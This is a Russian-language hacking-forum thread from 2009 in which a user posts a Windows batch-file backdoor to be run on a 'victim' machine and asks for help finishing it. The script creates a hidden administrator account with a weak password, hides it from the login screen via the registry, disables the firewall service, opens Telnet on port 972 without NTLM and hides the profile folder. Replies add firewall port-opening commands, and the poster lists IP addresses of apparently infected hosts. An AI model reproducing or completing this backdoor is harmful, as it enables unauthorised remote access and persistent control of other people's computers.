Что не хватает в bat"нике ?

Discussion in 'Болталка' started by Vlad&slav, 19 Jun 2009.

  1. Vlad&slav

    Vlad&slav Member

    Joined:
    1 Jan 2009
    Messages:
    207
    Likes Received:
    41
    Reputations:
    9
    Телнет - сетевой протокол для работы в удаленной системе в терминальном
    режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
    позволяющая нам подключаться к удаленным компьютерам.

    Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Делать это можно с помощью команд cmd
    Для этого напишим батник :

    PHP:
    chcp 1251
    net user SUPPORT_388945a0 
    /delete
    net user qwerty 123 
    /add
    net localgroup Администраторы qwerty 
    /add
    net localgroup Administrators qwerty 
    /add
    net localgroup Пользователи SUPPORT_388945a0 
    /del
    REG ADD 
    "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /"qwerty" /t REG_DWORD /d 0 /f
    net stop sharedaccess
    sc config sharedaccess start
    disabled
    regedit 
    /s conf.reg
    sc config tlntsvr start
    auto
    tlntadmn config port
    =972 sec=-NTLM
    net start Telnet

    Всё вроде верно, но перестало работать :confused:
    [​IMG]
    в том что комп включен уверен на 100%
    можт кто блочит, но не все же компы махом 0_o
    и адреса приходят

    порыскаав по нету нашол команду netsh firewall


    PHP:
    netsh firewall add portopening TCP 972 System
    или
    PHP:
    Netsh firewall add portopening protocol=tcp port=972 mode=enable scope=all
    незнаю как правильно и многое ли ето даст

    + хочется добавить скрытость на папку с юзером в документс анд сеттингс
    помоему команда
    PHP:
    attrib ++h C:\Documents and Settings\qwerty >nul
    должна сработать
    Отчётов уже огромный список а войти не могу =(

    кто нибудь может помоч мне дописать этого бакдора до конца, учтя все мелочи стукните в аску 2218982
    зарание спасибо
     
  2. Vlad&slav

    Vlad&slav Member

    Joined:
    1 Jan 2009
    Messages:
    207
    Likes Received:
    41
    Reputations:
    9
    вот нашол что вместо
    PHP:
    sc config tlntsvr startauto
    tlntadmn config port
    =972 sec=-NTLM
    net start Telnet
    лучше будет
    PHP:
    sc config tlntsvr startauto >nul
    tlntadmn config port
    =972 sec=-NTLM
    net start Telnet 
    >nul
     
  3. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Ябы уже лучше открывалбы удалёный рабочий стол, тоже 1 батником открывается, токо гуглить надо
     
  4. Vlad&slav

    Vlad&slav Member

    Joined:
    1 Jan 2009
    Messages:
    207
    Likes Received:
    41
    Reputations:
    9
    ну это уже другая тема, с этим проблем нету)
    да какая разница....
    ВСЁРАВНО СБОЙ :D
    у мя их уж список набрался =( ток они сдохли !
    Code:
    .....................
    77.40.12.36
    80.90.236.240
    82.200.252.13
    82.207.38.182
    82.207.63.63
    91.124.246.64
    92.115.31.129
    92.46.216.175
    92.46.218.171
    93.80.114.100
    93.80.114.100 
    94.41.141.100
    95.52.219.149
    95.52.220.11
    95.52.23.76
    95.59.37.124
     ....................